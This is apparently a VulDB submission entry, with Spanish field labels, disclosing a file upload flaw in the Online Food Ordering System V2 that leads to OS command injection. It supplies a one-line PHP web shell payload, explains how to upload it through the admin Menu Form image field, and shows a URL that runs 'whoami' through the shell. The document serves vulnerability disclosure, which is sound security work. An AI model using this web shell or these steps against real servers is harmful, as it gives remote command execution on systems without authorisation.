| Título | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| Descripción | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A File Upload Vulnerability which has been escalated to OS Command Injection in Online Food Ordering System V2 while uploading a .php file in "Menu Form" page.
`
Payload used:-
<?php system($_GET['c']); ?>
`
Parameter":-
Menu Form > Image: <?php system($_GET['c']); ?>
`
Steps to reproduce:-
1. Here we go to : http://localhost/fos/admin/index.php?page=menu
2. Now in those Parameters "Image" here we upload a php file
3. In that we put our payload "<?php system($_GET['c']); ?>" and we name it as 1.php and upload it
4. As we open in another tab we need to put our endpoint "?c=" and we can see our OS Command Injection Attack
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| Usuario | DisguisedRoot (UID 33702) |
|---|
| Sumisión | 2023-01-12 19:58 (hace 3 años) |
|---|
| Moderación | 2023-01-12 22:09 (2 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image escalada de privilegios] |
|---|
| Puntos | 17 |
|---|